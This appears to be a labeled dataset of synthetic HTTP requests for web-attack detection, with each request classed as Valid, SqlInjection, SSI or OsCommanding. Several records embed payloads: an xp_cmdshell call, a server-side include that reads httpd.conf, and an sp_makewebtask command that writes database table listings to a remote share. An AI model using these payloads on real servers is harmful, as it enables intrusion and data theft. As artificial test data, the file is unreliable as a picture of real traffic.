If-Unmodified-Since: Sat, 13 Aug 05 04:29:56 UTC
If-Match: "LbvFcuP1ok6DkRQN"
If-None-Match: *
If-Range: "HRH-EFb1dIpQwfhfR"
Max-Forwards: 938
MIME-Version: 4.8
Pragma: e1=pDeft
Proxy-Authorization: NTLM ZXJBcHl0Y2RzZXVvdXBlWmRhbjd0cmp0dnRpNTFmTlJjcmV0aQ==
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: /rtiicuep/ynata/hr9k/iOeneai/aaaedmec.tar
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: wXYBLT http://www.MclePgl.biz
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 601x4009
Via: 6.3 www.Wet8imi.css, 1.0 www.uaUaEtC.css
Transfer-Encoding: wsNAGv; ageais=adtrsnio
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38646
Start - Id: 34176
class: Valid
POST /rynbsOoosdsedyaico/ohj/eGl1wc/e_812hjq5nzMKc9S8wf7/sW12mX7qX@hcoQ.jpg? HTTP/1.1
Content-Length: 71
Content-Language: btat,iiqhisd
Content-Encoding: deflate
Content-Location: http://www.GTe66a.biz/s4si/Die9Di3i/w7eo.rar
Content-MD5: b3pjZXJhaW5iczJuMnRTdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jan 08 06:21:18 UTC
Last-Modified: Fri, 19 Aug 05 06:10:36 UTC
Host: 86.181.185.201
Connection: zuRtwr
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: a='s'
Client-ip: 175.250.136.161
Cookie: vwsqse4Ztd=gQF9ew905p0v;http2ebodyZfa6VA=opwutGiNtevoMiyyze;Cj5I=4kdustdhxeOreloon;lomer=2SCCa.7;t4Tlsd4=EhrssiO;g9lR9e6sHtevrws=778693961
Cookie2: $Version="6"
Date: Tue, 20 Oct 09 03:37:05 GMT
ETag: W/"pqMamA4R6r0UMCg.mI6n"
Expect: m5lbDOo=erih7hgs
From: nttld@dermemt1.biz
If-Modified-Since: Sat, 09 Jan 10 22:21:54 CET
If-Unmodified-Since: Mon, 17 May 04 05:42:55 UTC
If-Match: *
If-None-Match: "EOAQGE9Lq6yb94I0"
If-Range: Tue, 14 Jul 09 05:36:56 GMT
Max-Forwards: 4
MIME-Version: 8.3
Pragma: i='wryv'
Proxy-Authorization: Digest username="pcny3"
Authorization: Basic dGNlZTplTmVvNGU=
Range: -23,3-
Referer: /Iofh/hspmtiN/6rN8.dll
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/2.2 (Windows; U; WinNT 5.4; hr-4t; rv:5.9.0) Gecko/66446623
UA-CPU: MIPS
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 318x5638
Via: HTTP/8.6 www.nqel.jpg:40738, tIu9/6.2 252.158.211.209:39659, 2.9 181.67.117.34
Transfer-Encoding: identity
Upgrade: ciwqt/3.9, Ltten/0.9
Warning: 396 www.oinrDed.jpg "exeiei" 
X-Forwarded-For: 234.13.70.211
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

siIcg6c3eA=s%&esdbmn5sitohn=dlocationosDeunionrS&TOQs_mailQEe3F2=6399

End - Id: 34176
Start - Id: 34313
class: Valid
POST /ysLatdti/idoVrzT/fthydEgynNSt/fn-.M.e1_jrPHJmZijb/Suhos.shtml? HTTP/1.0
Content-Length: 223
Content-Language: reois,sra,Tae
Content-Encoding: identity
Content-Location: http://eeAh.de/zmao/rFhtd/EteaopLu.aspx
Content-MD5: ZXJTZXpkeXlsZXNnTGppZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Nov 08 19:47:59 GMT
Last-Modified: Sat, 15 Apr 06 22:17:40 CET
Host: www.rgyr.be:13
Connection: rndlXas
Accept: application/*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: lbTioa-hd3rrqit
Cache-Control: max-age=6
Client-ip: 28.152.174.188
Cookie: ntranGati=kontrhtaccessaJeitSt;lZsTdea2=pOjjUBxV;etwreioxaETim=9;zEtfi8Gongith1=816
Cookie2: $Version="975"
Date: Wed, 20 Jan 10 21:03:37 CET
ETag: "jf.g1rhp6GAJs.nAdJ"
Expect: dhub
From: soirif6p@llro3e7a.biz
If-Modified-Since: Sun, 04 Apr 04 02:36:36 CET
If-Unmodified-Since: Wed, 18 Feb 09 12:13:18 CET
If-Match: "fyG-4kKDFlEPfyd1oao6"
If-None-Match: "QGkYJ-hqMywlNjLmA"
If-Range: Sat, 09 Apr 05 21:12:54 UTC
Max-Forwards: 77
MIME-Version: 7.7
Pragma: uohsttk='eghiO'
Proxy-Authorization: Basic cGU0dGY6blFubmF1
Authorization: NTLM bG4ybVhwZWVsckhvMFBlYWpoZ29paWh0UmVtaXJldHRzaW9ldGdxZHRxc2ht
Range: -278160
Referer: /r3rieas/eiihzee/ndtit/rwes/nolsr.bin
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.6 (X11; U; SunOS sun4u 9.5; te-at; rv:3.6.2) Gecko/70221014
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 232x3371
Via: FTP/5.6 240.72.11.126:1, 6.5 193.213.179.231, lpiaD/9.2 197.211.98.133
Transfer-Encoding: s40sLa; Bitshk=xhre
Upgrade: iewoh/8.9, Tilhka/5.1, irihoc/2.3
Warning: 787 www.fsdTict.shtml "ediOEodoe" 
X-Forwarded-For: 252.208.59.218
X-Serial-Number: 87969067575
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dppkoc7sA=04185141&di19=o8aul8ie&tiAs4jnvhnnelna=gdmtmfloinl&e9mtwlncnM=tow&adclH0fnmsOef=nWQzaxh&lbn=aE5WXmTnBb&aw=dbXTQJpNVy&yaifTaoiilC=edqrhfLBw99&cyoftfgj=itO&bzIntce=iyfS&eOpwuntsra=rfYI-zv&1include3Bh1JlbgsoundQ9=nro

End - Id: 34313
Start - Id: 16099
class: Valid
GET /ptlrnddnf/pLSebce4/jdxwRc-l/sHwIHjOB/o3iiaFrrnqeAoaSohf/ogLqvJHjoJI3Ds1C./o9strqeap/khuU7U.php? HTTP/1.1
Host: www.igsrrrbtl.net
Connection: newhtadt
Accept: */*
Accept-Charset: iso-10646-ucs-2, iso-8859-2;q=0.6, iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 151.153.162.122
Cookie: BnzhU=sgroup byud;tre1duvy=ra~r;nu1iimsIGn=eadeout;8oLEGyAWa4a=uMereplaceg47s;eautoexecPFhDkC1Bd=xp_|;simAiscas=sc
Cookie2: $Version="9"
Date: Mon, 07 Dec 09 21:21:47 UTC
ETag: "qYZJTrsJ1ro2lkZfi"
Expect: 7e7t=az3te;Nocerre
From: exir@MtsL5edgR.cz
If-Modified-Since: Thu, 04 Feb 10 01:06:23 GMT
If-Unmodified-Since: Thu, 23 Jul 09 23:24:33 GMT
If-Match: "rBg-AfMAvklAG7S"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.0
Pragma: ornGhDfe='kte'
Proxy-Authorization: Basic cmlkZXdlOm9panNpc25y
Authorization: Digest nc=cBB84107
Range: 303812-992,8-0,-1
Referer: /4sla0eub/qts3d/n9a33m/fnfi8.tar.gz
TE: trailers,gzip,trailers
Trailer: Cache-Control
User-Agent: jeniRc/1.2.9
UA-CPU: StrongARM
UA-Disp: 991,4973,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4520x648
Via: FTP/1.3 176.178.171.253:00
Transfer-Encoding: identity
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 767 www.ohsi.tiff "lE5y8saal" 
X-Forwarded-For: 44.155.173.100
X-Serial-Number: 6495346475
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16099
Start - Id: 21969
class: Valid
GET /ciwU3qM--8YgMEQ6p/cexeck@9a/gPD/SAwo/ubH_Ll.exe?aneqmiigadnuon=0ac&ob=3r3t&eorz9apinlmewe=CaveaEi&fI0v7B1Hsy=Heawindow.open%5B&6sow=hebttsystemD&4WTC=%2B%2Fn&gWgoi3=466395&be9=+4echoevalLhpassthrue+accept&VAdWgFpuWj=+%24t0d&rotl1srarir=snEonscriptaNshutdownf%3Ahaving+hra&9eyed5=iyhumnpunperlei HTTP/1.0
Host: www.tcn7.org
Connection: 588im79
Accept: */*;q=0.3
Accept-Charset: x-mac-icelandic, utf-7, euc-cn, macintosh, x-mac-hebrew
Accept-Encoding: identity;q=0.0
Accept-Language: aen-la;q=0.9, ohea-ooeEra3;q=0.0, im-atppltes, h-nd, Nstmbas2-i
Cache-Control: min-fresh=8
Client-ip: 3.169.52.148
Cookie: TRau7sdWoNeMw=msh'dh@0a0e~h;s;oifljtogydtc94t=ptwoOeshb2l;rtoufeEpv=insertlhg';ftlRidnEGsB=foall]lU-7;raexeefevqd=olRo8st;chbtwepsacidee=1406891
Cookie2: $Version="56"
Date: Tue, 10 Jul 07 08:45:50 CET
ETag: W/"EZjHKSYpN0cIzTZf8Y3"
Expect: neoot=oinv6tgt
From: zeose@esnekaphed.be
If-Modified-Since: Mon, 10 Dec 07 12:56:55 GMT
If-Unmodified-Since: Sun, 10 Apr 05 12:59:37 CET
If-Match: "8A5ZTIeiz1Tcr.3pBXB"
If-None-Match: *
If-Range: "0pADCQga@P4kdkYS."
Max-Forwards: 0864
MIME-Version: 4.8
Pragma: ura=Kogarl
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: n7ttn eohsaan=sics
Range: 2-874,8-,3113-623962
Referer: /iNlbH6e/einsnes.swf
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: Expect
User-Agent: hwEETqVN http://www.ltwzinr.it
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 044x0436
Via: 5.9 2.128.65.161:17801, 4.8 www.sxHt.png
Transfer-Encoding: compress
Upgrade: fysst/0.3
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 198.11.68.176
X-Serial-Number: 09176432061314
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21969
Start - Id: 35045
class: SqlInjection
GET /ohsop1t31ttrlAe1i/bacceptl/oiqo868Rr9ep5Ntt/so/ptgM/srtsaaleZoroohro/n0azL/yqnOyK_D-hNcT60E/nlnTanodurho/lAf.php3?wyue49E=7i%28%3Areplace&eccee=gsock_stream%25cr%3C6pstdingy%3Ah%3Ezed%3B&-@IPlQ8Er=bduJV&6UKUM5=jerhTIsed%2F%2Balsr&wSuirsnnild7td=D%3Ctuscriptjq+whereo%27%29stin&on0sal5aawiyt=TueandheO&enhdeinwhdukx=h&ootlte1tNx=102071610&ttecriisteqs=ptd&og=00373&eeiElt=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe HTTP/1.0
Host: 221.220.149.182:455
Connection: lS5Ngjm
Accept: audio/x-wav;q=0.5, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=29630
Client-ip: 175.67.198.190
Cookie: aepmttfdt=19;eiclnvsfwre2rdu=ya3E9S=Nhdl2H;a0riDa=ulsw0a3ci2tstNj;LjKI6GE=he'EnWnmsom s;dfnoIOceat8Ahe=793
Cookie2: $Version="164"
Date: Thu, 20 May 04 22:56:54 GMT
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Sun, 13 Sep 09 06:34:07 UTC
If-Unmodified-Since: Sun, 09 Jul 06 21:21:06 CET
If-Match: "@E7Ef4CY-tUdMPWb1R5"
If-None-Match: "GKtrY63.V_2TGqIQgc5"
If-Range: *
Max-Forwards: 282
MIME-Version: 0.3
Pragma: th=lhhn
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: nMsev rhec=oooQeenc
Range: -373777
Referer: http://www.qaeo8.uk/rdnehdym.dll
TE: trailers
User-Agent: Mozilla/3.5 (compatible; Konqueror/3.2; Mac OS X; sAcl7seDsd)
UA-CPU: StrongARM
UA-Color: color32
Via: rtsat/8.5 244.182.146.235:6, mte/8.9 www.u1Eqhie8.png
Transfer-Encoding: compress
Upgrade: ntza0i/5.5
Warning: 100 www.saeeiu.png "ehgteoiulnle" "Tue, 31 May 05 03:38:13 GMT"
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35045
Start - Id: 13557
class: Valid
GET /nnfIEGtRI_2DJ0Qpn.asmx?ctnc2jus=ft&auutnrhc=-xtse+&l5Jn3E54rtUgoa=aotDYegeiseaNrt&eacqsqs0=ehtd&hbba=02&ez3=10967545&e7ed9itccAottnu=talalR&sesi=esauijz&edssnea=oc542x2USRG HTTP/1.1
Host: 66.50.51.90
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 186.108.47.189
Cookie: 7irne=70;Igozaiht=62984259;qsdwotyeoavsmm=2939;3u8p=St2onsuayvl;ouhstap=06;aitni0chtMep=jhcopy)y
Cookie2: $Version="91"
Date: Thu, 01 Apr 10 22:34:41 UTC
ETag: W/"3-8ueFgn@WAbCGu@cRQ"
Expect: 100-continue
From: rctr@uneqdrer.ch
If-Modified-Since: Sun, 10 Aug 08 12:00:16 GMT
If-Unmodified-Since: Thu, 22 Jan 09 14:06:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 282
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: noxn uaenegsM=zmtlt
Authorization: NTLM THRzb2d0dWxldGlSYWFtZVBlaG50dGN5QXRvaEVTSXdiamV0bGJ4dTVyc2xQ
Range: -53
Referer: http://isa5.fr/yeetxtwt/yneea.tar
TE: gzip,trailers,gzip;q=0.7
Trailer: TE
User-Agent: Mozilla/0.4 (X11; U; Solaris 9.5; dr-ii; rv:4.1.5) Gecko/11635325
UA-CPU: x86
UA-Disp: 8631,7824,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1988x830
Via: 9.3 www.kpests4o.js, 9.1 67.159.183.247, HTTP/6.7 185.4.107.171
Transfer-Encoding: hlzt; qar7ma=3e4ehas
Upgrade: teu/6.7, dj3/9.0, entsiy/1.9
Warning: 043 146.69.29.103 "pLtaauntea6teETrue" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 70032554284651
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13557
Start - Id: 29658
class: Valid
GET /txnoeozt/wKddsomb-j0vVnfcU/CUXZ0l.html?phtMkcomh=Eecho&hFank4gcOrs=dai%3E+hy+se&bh=27&nH4sos2rg3=vymeAsionae5i&VbAY=Tueajnteh&oa=eLBifowTS&tnFoliasmd=tTaaS%25%3E+da+nqTa HTTP/1.0
Host: 42.165.198.20
Connection: lteake
Accept: audio/basic;q=0.5
Accept-Charset: isiri-3342
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=251
Client-ip: 253.106.46.66
Cookie: lbooc= lRspn;rYdsh12a8X=527;4nyeB=eneiawun;aqshpo=2605220498;ooslitNe=rlaji3;tsMEbioosCe=ns2script8nf>ei-blscript] ;Eum
Cookie2: $Version="70"
Date: Sun, 09 Jul 06 17:09:34 CET
ETag: "ihpWJEqupB6sBE_6"
Expect: 100-continue
From: o1io9ajb@ssritvoml.st
If-Modified-Since: Sat, 04 Jul 09 04:11:26 GMT
If-Unmodified-Since: Sun, 31 May 09 03:35:19 CET
If-Match: "WUmYfX5tuIc8BCKSNP"
If-None-Match: "Imfwy@_IYvL3Kjztc"
If-Range: "eOu-f.0pDQewLr.04PqT"
Max-Forwards: 6650
MIME-Version: 2.0
Pragma: sejioe=hi
Proxy-Authorization: NTLM N2kzZG9obnRhY2llZWRDemRhYmhueGVlcmFsbnJjb2NjZW9ybW9uWXM=
Authorization: Basic VG5pZWVsOmk1QWFu
Range: 0-345
Referer: http://www.tiEe5d.it/2naontt.exe
TE: trailers,trailers
Trailer: From
User-Agent: 2ihuu (fjV6KM; 6QJFnDb; nf4a2fVBST)
UA-CPU: 68000
UA-Disp: 844,9536,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8055x615
Via: 1.7 www.o7rir.tiff, HTTP/8.1 www.0etis.shtml, 8.6 77.78.17.245:827
Transfer-Encoding: gzip
Upgrade: nbyrR/0.6, hSeaai/0.0
Warning: 090 13.131.122.112 "itg25e6tOo" "Sun, 12 Jun 05 20:38:04 UTC"
X-Forwarded-For: 1.132.193.200
X-Serial-Number: 149051815209
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29658
Start - Id: 9189
class: Valid
GET /cDn8DRcm/e5hjgEiv/ejnhe/oBhX53pGE/1sona2lpnm0t/CcNDmotohz120A/d1Gwd9ftWkb/QCIandr.QSSzr/jsi4m/o2.shtml? HTTP/1.0
Host: 82.197.157.131
Connection: close
Accept: application/*, image/jpeg;q=0.5, video/quicktime;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: teeoi-sa4ast, Irfdbn8-ibBdwa, keSapn-lq0;q=0.1, t-a;q=0.9
Cache-Control: min-fresh=1
Client-ip: 77.58.247.61
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="958"
Date: Wed, 25 Jun 08 20:09:53 CET
ETag: ".PNmoWQxucn6Dgw@y13"
Expect: 100-continue
From: egrds@churmi.org
If-Modified-Since: Sat, 10 Jul 04 13:09:45 GMT
If-Unmodified-Since: Sun, 04 Jan 09 24:10:05 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Jan 05 01:03:57 GMT
Max-Forwards: 281
MIME-Version: 8.7
Pragma: zarsirr=taNws
Proxy-Authorization: NTLM bmRlZ3JoZmEzbmlQZ29kSWJOb25ydDFvb1VubjZlOHJk
Authorization: Digest qop=risd
Range: 57164-,9027-962000
Referer: http://pttwa.cz/itliaeye/etl4t/ea5bva.png
TE: gzip,trailers
Trailer: Range
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 3.4; No-hu; rv:7.9.0) Gecko/46924943
UA-CPU: StrongARM
UA-Disp: 5248,9403,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3033x117
Via: 7.6 www.rseS0.shtml, FTP/4.3 191.163.36.107
Transfer-Encoding: compress
Upgrade: a7ng1h/4.9, wds/9.4, ieM/3.0
Warning: 029 www.rgnrlhe.js "hetef0djrse" "Sun, 29 Aug 04 17:38:57 GMT"
X-Forwarded-For: 252.67.93.211
X-Serial-Number: 51512121332021601
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9189
Start - Id: 13224
class: Valid
GET /kNha7g1r6er/iH4XlYyBNQL3A5wvgX./ikwBQLdv9ogaOCC/eater7udeByit/DJG1/scy.JaEPLST/es.shtml?2irEiEyjhnu=16142160&HnyJ=la%2Bs%5BaOr&n7bueass=formie6oth&ai=%24rSa&aitmhihaemhruy=eK2hFta&fqnem4r=635&hoslw=mesrdteat&anvls0aLlcs=07&awhx=pIrtmnsW&THJonTete=vanas%25+%2B&9H32r1.V=9 HTTP/1.0
Host: 76.136.42.34:80
Connection: keep-alive
Accept: video/*;q=0.0, audio/basic
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 93.188.236.120
Cookie: Nllglf5gma=8169;FHV_P=pro
Cookie2: $Version="212"
Date: Tue, 19 Sep 06 17:47:00 GMT
ETag: "ZANmXnakMXp8cfOM7"
Expect: dIf3ftsh=cioiNli;Khkkl7n
From: n7Oyrrss@th5Bs.cz
If-Modified-Since: Tue, 28 Nov 06 05:22:33 UTC
If-Unmodified-Since: Wed, 18 Jun 08 18:54:53 GMT
If-Match: *
If-None-Match: "LIG4QuFHSZRrLAwM0r1"
If-Range: "LlsmkJeUpulMj7cRyo8"
Max-Forwards: 0906
MIME-Version: 2.3
Pragma: ltondh=z
Proxy-Authorization: NTLM Z291M0xhdmFvaXR0bzFhdG5ubHF5OWVqaWlvbjY0bW1hZzE0cmE=
Authorization: fewgtP rbEh0=uese
Range: 781398-
Referer: http://www.0liri9.ch/rgsia/a3Sgmc6.txt
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.6 (Windows; U; WinNT 0.1; ey-et; rv:3.2.4) Gecko/61979335
UA-CPU: Sparc
UA-Disp: 2503,069,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0644x4793
Via: FTP/9.1 206.171.205.175:4, HTTP/1.1 www.ouEelej.jpg, 4.8 50.203.215.235
Transfer-Encoding: compress
Upgrade: tsts/0.5, eao/0.4, t6o/4.1, 2ibk/6.8, ihsqE/6.1
Warning: 804 52.198.77.145:821 "g3zj2ao" 
X-Forwarded-For: 112.1.79.197
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13224
Start - Id: 39799
class: SSI
GET /tgofVouSof/vuS/f1j/oKLcLu1_W/4u2reOtFiscmeRtrohd/7rG@cmdXvsock_streamY@qDK/Ae/tUuw0BQc2amAtI1/passwddNED/at4dus7dTenexztNtsq.php3?0lu=%3C%21--+++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&nn8Or=etb%26&g6=6&xmlAFgbodyKnodeUreplace=8b%3Dn HTTP/1.1
Host: 20.97.23.172
Connection: close
Accept: application/*;q=0.5, video/*;q=0.0, text/plain
Accept-Charset: iso-2022-jp, iso-10646-ucs-2, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 252.98.95.119
Cookie: racRda5wruslh=a?g;oeermit=taQnih5e5tpc;nje=iaene2d;hrPvt5lhi9=QnZhS0
Cookie2: $Version="9"
Date: Wed, 17 May 06 05:56:55 CET
ETag: "1MI3X5pRIo3ZW19eTlb1"
Expect: 100-continue
From: otit3le@ijlhneot1o.com
If-Modified-Since: Mon, 25 Aug 08 22:09:53 GMT
If-Unmodified-Since: Mon, 02 Jan 06 23:02:24 UTC
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
If-Range: Sun, 23 Oct 05 10:53:14 GMT
Max-Forwards: 0
MIME-Version: 1.9
Pragma: o=pmEtons
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Digest uri=http://www.wrOk.net/hoodei/i9fdm/hosOp8.rar
Range: 2975-
Referer: http://www.tlyhcll.org/tdeyd8so/catnoohk/rgem017.asmx
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: Mozilla/6.5 (X11; U; Unix 7.4; sr-ce; rv:9.2.8) Gecko/85440251
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 468x7869
Via: HTTP/6.3 www.tiCo8.jpg, apsspd/3.6 230.233.79.136, 0.6 99.76.109.82
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 197.171.250.97
X-Serial-Number: 0280999804959
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39799
Start - Id: 3710
class: Valid
GET /OAHa_Y/uatci/3dsvtra/iutxtBRneettpIqa/JOjRmRN/47j-UR/syTuCHMQ_ZOqwq/saaotoewaoesmf95cnq/e_VS@8M2CSNAR-P/aHUH/8eaCe5erUnrerfSoNb/hP.php?eL3JrcpVvOjmochau=5 HTTP/1.0
Host: 69.190.169.176
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 24.233.165.7
Cookie: sescetim=AiedouijN;3T0E=7314836;EenptTphe=  allaot jonvbscriptprocessing-instructionme
Cookie2: $Version="6"
Date: Wed, 10 Jan 07 20:30:34 CET
ETag: "KY2yq@pBRDS9G4r"
Expect: mjtiwd
From: mlrs@mfdec.biz
If-Modified-Since: Tue, 23 Oct 07 06:30:41 GMT
If-Unmodified-Since: Mon, 03 Oct 05 10:44:38 UTC
If-Match: *
If-None-Match: *
If-Range: "XyXROkLT3dokqVvQtXAV"
Max-Forwards: 1
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: y4v4a Ntmbna=bsfti
Authorization: haoa cnjrI=6rh1z
Range: 355373-92094,2954-
Referer: /2nwto/ryrGr/vnioi/jCi8.cfm
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: aAgdoI/7.9
UA-Disp: 7385,2023,32
UA-OS: Windows NT
Via: 3.2 www.znhdo0.html:2
Transfer-Encoding: deflate
Upgrade: Tsi/8.6, bnm/3.1, hnbgU/5.3
Warning: 808 57.84.39.186 "tRmna" 
X-Forwarded-For: 95.113.101.82
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 3710
Start - Id: 9091
class: Valid
GET /iHszeSC.FOkbAXoPrruB/phxlith.nsf? HTTP/1.1
Host: 212.29.65.25
Connection: close
Accept: */*
Accept-Charset: euc-kr, utf-8;q=0.2
Accept-Encoding: 
Accept-Language: roild-Eotft;q=0.6, b-natamtd, aa-lI1t;q=0.6, os-Zebo8c, LAhtggmn-4r;q=0.2
Cache-Control: ssd4='1oharee'
Client-ip: 153.209.86.89
Cookie: eeshIit1a=acujbno:maccess_logp0-;x8=Rot1as7rssenhtpassf;0Ssn8gCoy=eS@yJWeE;baobl=dMjyfI
Cookie2: $Version="10"
Date: Fri, 18 Sep 09 10:41:53 CET
ETag: "N-_Zl.xtPHZul@X7ViA"
Expect: atctr7=tetz0Vi;iurtb
From: MxDlrni@bvibt3iny0.com
If-Modified-Since: Thu, 17 Jan 08 24:26:17 CET
If-Unmodified-Since: Fri, 05 Oct 07 01:02:13 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Nov 09 03:30:09 UTC
Max-Forwards: 1361
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM ZW5pZGlub3N0YWVuYUVieW5iYmhybmNXbXdvdGJLc3NhZXM=
Authorization: Basic bnZ5YzpuY25s
Range: -74002,17-59,16-
Referer: http://at97.fr/nhdvHa/ereP/nthTgt/b3urersd/deot.pdf
TE: trailers
Trailer: Authorization
User-Agent: rsssee
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9463x953
Via: 1.2 www.damnn.jpeg:146, 3.1 www.tlms.tiff:47094
Transfer-Encoding: 3yai
Upgrade: Tedivm/2.5, ca3x9/5.8, stcsQ/8.5, azaee/6.9, hsei/4.7
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9091
Start - Id: 36426
class: OsCommanding
PUT /rJUEuwmryrW/onaedc1etgctowrcl/hGK/GIGUne6RK/aeatmfeqEbhaeHaMsaac/dn7QaHRVzcI8fp/epkbxvjhlfE/wAxfr@b_WXpX@.3O.jsp? HTTP/1.0
Content-Length: 118
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 04 Jul 04 03:01:13 UTC
Host: www.aOreayeos7.st
Connection: hS4dss
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: ';   EXEC master..sp_makewebtask  "\\163.67.182.46\t2ehbdae\le.htm", "SELECT *     FROM  INFORMATION_SCHEMA.TABLES"
Accept-Language: *;q=0.9
Cache-Control: no-cache
Date: Thu, 15 Apr 10 12:01:12 GMT
If-Match: "gl2m8yQGmiZC@2U"
Pragma: no-cache
Referer: /Indl/lpErdogy/3aat.gif
User-Agent: srsatnaylgiai
UA-Disp: 4039,4471,32

OXb.q=30894323&idm70ont=eoUr&eowc=tOneE0iidc&rnd4Nh=179&8divlgEHperlr9oxinsert=unoaR~\[aeNittxml%&stubeegy=ekS

End - Id: 36426
Start - Id: 13658
class: Valid
GET /_atWuT7uNHTOE.pl?0ffoebipu=-&1c2s=belAxe&Atyteujeespanal=vA4einputostsriieefaascript&trcp5qI=9485&9oa7tmtdetdEuOp=7&eafhio=systemeiohee&nnd=e%7CTshee9bwpsaCtpositiondla3&mrceetdbdnnaqe7=nedEiv0ierce&tiApobf7=lib+&oIetnjfnNl=aboot.iniig&wIckeet5teepsa=2315106&opD=58419&usqetnotl9gzsc=385 HTTP/1.1
Host: www.rT2inre2.st:78468
Connection: Taciro
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress, compress
Accept-Language: *;q=0.1
Cache-Control: max-age=9
Client-ip: 148.192.91.169
